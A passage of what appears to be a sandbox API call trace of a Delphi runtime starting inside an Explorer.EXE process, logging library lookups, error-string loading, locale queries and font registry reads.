GetProcAddress (hModule=0x732a0000, lpProcName="AccessibleChildren") returned 0x732a5d25 [0281.491] IsBadReadPtr (lp=0x62141b8, ucb=0x14) returned 0 [0281.493] GetCurrentThreadId () returned 0x62c [0281.493] LocalAlloc (uFlags=0x40, uBytes=0x40) returned 0x2fb3ad8 [0281.493] SetThreadLocale (Locale=0x400) returned 1 [0281.493] GetVersion () returned 0x1db10106 [0281.494] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0281.494] GetProcAddress (hModule=0x77780000, lpProcName="GetThreadPreferredUILanguages") returned 0x777c22d7 [0281.494] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0281.495] GetProcAddress (hModule=0x77780000, lpProcName="SetThreadPreferredUILanguages") returned 0x777be627 [0281.495] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0281.495] GetProcAddress (hModule=0x77780000, lpProcName="GetThreadUILanguage") returned 0x777bae42 [0281.496] GetSystemInfo (in: lpSystemInfo=0x534f940 | out: lpSystemInfo=0x534f940*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0281.496] GetCommandLineW () returned="C:\\Windows\\Explorer.EXE" [0281.496] GetStartupInfoW (in: lpStartupInfo=0x534f91c | out: lpStartupInfo=0x534f91c*(cb=0x44, lpReserved="C:\\Windows\\Explorer.EXE", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\Explorer.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x409, dwFillAttribute=0xf40000, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x200202, hStdError=0x1f80)) [0281.496] GetACP () returned 0x4e4 [0281.496] GetCurrentThreadId () returned 0x62c [0281.496] GetVersion () returned 0x1db10106 [0281.496] GetVersionExW (in: lpVersionInformation=0x534f850*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77bbf879, dwMinorVersion=0x77bbf99a, dwBuildNumber=0x281c28, dwPlatformId=0x534f8b6, szCSDVersion="") | out: lpVersionInformation=0x534f850*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0281.496] GetModuleFileNameW (in: hModule=0x5fc0000, lpFilename=0x534d70c, nSize=0x20a | out: lpFilename="") returned 0x0 [0281.496] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x534d4f6, nSize=0x105 | out: lpFilename="C:\\Windows\\Explorer.EXE") returned 0x17 [0281.496] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x6260000 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffc9, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffc8, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffc7, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffc6, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffc5, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffc4, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffc2, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffc3, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffd5, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffde, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0281.497] LoadStringW (in: hInstance=0x5fc0000, uID=0xffd4, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffd0, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffd8, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffd7, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffe8, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffe9, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffea, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffe7, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffe5, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffe3, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffe2, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffe1, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffe0, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffff, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xfffe, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xfffd, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xfff6, lpBuffer=0x534d938, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0281.498] LoadStringW (in: hInstance=0x5fc0000, uID=0xffe4, lpBuffer=0x534d938, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0281.498] GetVersionExW (in: lpVersionInformation=0x534f84c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x534f84c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0281.498] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77780000 [0281.499] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2fe1488 [0281.499] GetProcAddress (hModule=0x77780000, lpProcName="GetNativeSystemInfo") returned 0x777bbe77 [0281.499] GetNativeSystemInfo (in: lpSystemInfo=0x534f828 | out: lpSystemInfo=0x534f828*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x1, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x2d07)) [0281.499] LoadStringW (in: hInstance=0x5fc0000, uID=0xff5f, lpBuffer=0x534d81c, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0281.500] LoadStringW (in: hInstance=0x5fc0000, uID=0xff42, lpBuffer=0x534d81c, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0281.500] LoadStringW (in: hInstance=0x5fc0000, uID=0xfffc, lpBuffer=0x534d930, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0281.500] LoadStringW (in: hInstance=0x5fc0000, uID=0xfffb, lpBuffer=0x534d930, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0281.500] LoadStringW (in: hInstance=0x5fc0000, uID=0xfffa, lpBuffer=0x534d930, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0281.500] LoadStringW (in: hInstance=0x5fc0000, uID=0xfff9, lpBuffer=0x534d930, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0281.500] LoadStringW (in: hInstance=0x5fc0000, uID=0xfff8, lpBuffer=0x534d930, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0281.500] LoadStringW (in: hInstance=0x5fc0000, uID=0xff89, lpBuffer=0x534d930, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0281.500] LoadStringW (in: hInstance=0x5fc0000, uID=0xff68, lpBuffer=0x534d930, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0281.500] GetVersionExW (in: lpVersionInformation=0x534f840*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x2d070006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x534f840*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0281.500] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0281.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0281.500] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x635f40c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0281.501] GetProcAddress (hModule=0x77780000, lpProcName="GetDiskFreeSpaceExW") returned 0x777bde40 [0281.501] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x534f716, nSize=0x105 | out: lpFilename="C:\\Windows\\Explorer.EXE") returned 0x17 [0281.501] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x534f924 | out: phkResult=0x534f924*=0x0) returned 0x2 [0281.501] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x534f924 | out: phkResult=0x534f924*=0x0) returned 0x2 [0281.501] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x534f924 | out: phkResult=0x534f924*=0x0) returned 0x2 [0281.501] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x534f924 | out: phkResult=0x534f924*=0x0) returned 0x2 [0281.501] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x534f924 | out: phkResult=0x534f924*=0x0) returned 0x2 [0281.501] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x534f924 | out: phkResult=0x534f924*=0x0) returned 0x2 [0281.501] GetThreadLocale () returned 0x409 [0281.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x534f864 | out: lpCPInfo=0x534f864) returned 1 [0281.501] GetThreadLocale () returned 0x409 [0281.501] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x534f658, cchData=256 | out: lpLCData="2") returned 2 [0281.501] GetThreadLocale () returned 0x409 [0281.501] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0281.501] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Sun") returned 4 [0281.501] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Sunday") returned 7 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Mon") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Monday") returned 7 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Tue") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Wed") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Thu") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Thursday") returned 9 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Fri") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Friday") returned 7 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Sat") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x534f5a4, cchData=256 | out: lpLCData="Saturday") returned 9 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Jan") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="January") returned 8 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Feb") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="February") returned 9 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Mar") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="March") returned 6 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Apr") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="April") returned 6 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="May") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="May") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Jun") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="June") returned 5 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Jul") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="July") returned 5 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Aug") returned 4 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="August") returned 7 [0281.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Sep") returned 4 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="September") returned 10 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Oct") returned 4 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="October") returned 8 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Nov") returned 4 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="November") returned 9 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="Dec") returned 4 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x534f5a8, cchData=256 | out: lpLCData="December") returned 9 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x534f5f8, cchData=256 | out: lpLCData="$") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x534f5f8, cchData=256 | out: lpLCData="0") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x534f5f8, cchData=256 | out: lpLCData="0") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x534f7f0, cchData=2 | out: lpLCData=",") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x534f7f0, cchData=2 | out: lpLCData=".") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x534f5f8, cchData=256 | out: lpLCData="2") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x534f7f0, cchData=2 | out: lpLCData="/") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x534f5b0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x534f5b0, cchData=256 | out: lpLCData="1") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x534f5b0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x534f5b0, cchData=256 | out: lpLCData="1") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x534f7f0, cchData=2 | out: lpLCData=":") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x534f5f8, cchData=256 | out: lpLCData="AM") returned 3 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x534f5f8, cchData=256 | out: lpLCData="PM") returned 3 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x534f5f8, cchData=256 | out: lpLCData="0") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x534f5f8, cchData=256 | out: lpLCData="0") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x534f5f8, cchData=256 | out: lpLCData="0") returned 2 [0281.503] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x534f7f0, cchData=2 | out: lpLCData=",") returned 2 [0281.504] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x77a00000 [0281.504] GetProcAddress (hModule=0x77a00000, lpProcName="VariantChangeTypeEx") returned 0x77a04c28 [0281.504] GetProcAddress (hModule=0x77a00000, lpProcName="VarNeg") returned 0x77a7c802 [0281.505] GetProcAddress (hModule=0x77a00000, lpProcName="VarNot") returned 0x77a7ec66 [0281.505] GetProcAddress (hModule=0x77a00000, lpProcName="VarAdd") returned 0x77a25934 [0281.506] GetProcAddress (hModule=0x77a00000, lpProcName="VarSub") returned 0x77a7d332 [0281.506] GetProcAddress (hModule=0x77a00000, lpProcName="VarMul") returned 0x77a7dbd4 [0281.506] GetProcAddress (hModule=0x77a00000, lpProcName="VarDiv") returned 0x77a7e405 [0281.507] GetProcAddress (hModule=0x77a00000, lpProcName="VarIdiv") returned 0x77a7f00a [0281.507] GetProcAddress (hModule=0x77a00000, lpProcName="VarMod") returned 0x77a7f15e [0281.507] GetProcAddress (hModule=0x77a00000, lpProcName="VarAnd") returned 0x77a25a98 [0281.508] GetProcAddress (hModule=0x77a00000, lpProcName="VarOr") returned 0x77a7ecfa [0281.508] GetProcAddress (hModule=0x77a00000, lpProcName="VarXor") returned 0x77a7ee2e [0281.508] GetProcAddress (hModule=0x77a00000, lpProcName="VarCmp") returned 0x77a1b0dc [0281.509] GetProcAddress (hModule=0x77a00000, lpProcName="VarI4FromStr") returned 0x77a16fab [0281.509] GetProcAddress (hModule=0x77a00000, lpProcName="VarR4FromStr") returned 0x77a201a0 [0281.509] GetProcAddress (hModule=0x77a00000, lpProcName="VarR8FromStr") returned 0x77a1699e [0281.510] GetProcAddress (hModule=0x77a00000, lpProcName="VarDateFromStr") returned 0x77a26ba7 [0281.510] GetProcAddress (hModule=0x77a00000, lpProcName="VarCyFromStr") returned 0x77a46c12 [0281.511] GetProcAddress (hModule=0x77a00000, lpProcName="VarBoolFromStr") returned 0x77a1dbd1 [0281.511] GetProcAddress (hModule=0x77a00000, lpProcName="VarBstrFromCy") returned 0x77a27fdc [0281.511] GetProcAddress (hModule=0x77a00000, lpProcName="VarBstrFromDate") returned 0x77a17a2a [0281.512] GetProcAddress (hModule=0x77a00000, lpProcName="VarBstrFromBool") returned 0x77a20355 [0281.512] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0281.512] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0281.512] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x636678c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0281.513] GetProcAddress (hModule=0x77780000, lpProcName="InitializeConditionVariable") returned 0x77bb9981 [0281.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0281.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x635f574, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0281.513] GetProcAddress (hModule=0x77780000, lpProcName="WakeConditionVariable") returned 0x77c05a7b [0281.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0281.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x636678c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0281.514] GetProcAddress (hModule=0x77780000, lpProcName="WakeAllConditionVariable") returned 0x77b845a5 [0281.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0281.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x636678c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0281.514] GetProcAddress (hModule=0x77780000, lpProcName="SleepConditionVariableCS") returned 0x777b18be [0281.514] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x6f8 [0281.514] GetACP () returned 0x4e4 [0281.514] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x534f918 | out: lpCPInfo=0x534f918) returned 1 [0281.514] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x824 [0281.514] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x828 [0281.514] QueryPerformanceCounter (in: lpPerformanceCount=0x534f93c | out: lpPerformanceCount=0x534f93c*=16438783097098) returned 1 [0281.514] GetDC (hWnd=0x0) returned 0xc01016e [0281.515] GetDeviceCaps (hdc=0xc01016e, index=90) returned 96 [0281.515] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.515] GetDC (hWnd=0x0) returned 0xc01016e [0281.515] GetDeviceCaps (hdc=0xc01016e, index=104) returned 0 [0281.515] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.515] CreatePalette (plpal=0x534f54c) returned 0x7080235 [0281.515] GetStockObject (i=7) returned 0x1b00017 [0281.515] GetStockObject (i=5) returned 0x1900015 [0281.515] GetStockObject (i=13) returned 0x18a002e [0281.515] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0281.515] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0281.515] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", ulOptions=0x0, samDesired=0x20019, phkResult=0x534f82c | out: phkResult=0x534f82c*=0x830) returned 0x0 [0281.515] RegQueryValueExW (in: hKey=0x830, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x534f800, lpData=0x0, lpcbData=0x534f818*=0x0 | out: lpType=0x534f800*=0x1, lpData=0x0, lpcbData=0x534f818*=0xe) returned 0x0 [0281.515] RegQueryValueExW (in: hKey=0x830, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x534f814, lpData=0x6349b9c, lpcbData=0x534f824*=0xe | out: lpType=0x534f814*=0x1, lpData="Tahoma", lpcbData=0x534f824*=0xe) returned 0x0 [0281.515] RegCloseKey (hKey=0x830) returned 0x0 [0281.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahoma", cchWideChar=6, lpMultiByteStr=0x534f859, cbMultiByte=255, 